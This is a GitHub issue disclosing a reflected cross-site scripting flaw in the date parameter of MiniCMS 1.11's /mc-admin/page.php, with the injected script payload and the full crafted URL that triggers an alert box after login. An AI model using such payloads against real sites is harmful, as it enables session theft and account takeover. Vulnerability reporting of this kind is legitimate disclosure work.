A Reflected Cross-Site Scripting vulnerability exists in the /mc-admin/page.php in version 1.11 #49

thisissuperann · 2024-04-02T01:29:22Z

vulnerability location:date parameter
/MiniCMS-1.11/mc-admin/page.php?state=draft&date=2024-04

Payload:
</script><script>alert(123)</script>
Access the address with payload after login:
/MiniCMS-1.11/mc-admin/page.php?state=draft&date=2024-04</script><script>alert(123)</script>
Then we can find it triggering the xss vulnerability:

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

A Reflected Cross-Site Scripting vulnerability exists in the /mc-admin/page.php in version 1.11 #49

A Reflected Cross-Site Scripting vulnerability exists in the /mc-admin/page.php in version 1.11 #49

thisissuperann commented Apr 2, 2024

A Reflected Cross-Site Scripting vulnerability exists in the /mc-admin/page.php in version 1.11 #49

A Reflected Cross-Site Scripting vulnerability exists in the /mc-admin/page.php in version 1.11 #49

Comments

thisissuperann commented Apr 2, 2024